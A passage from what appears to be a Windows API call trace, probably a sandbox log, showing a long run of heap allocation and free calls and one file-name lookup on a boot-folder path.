(HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.662] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0178.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.662] 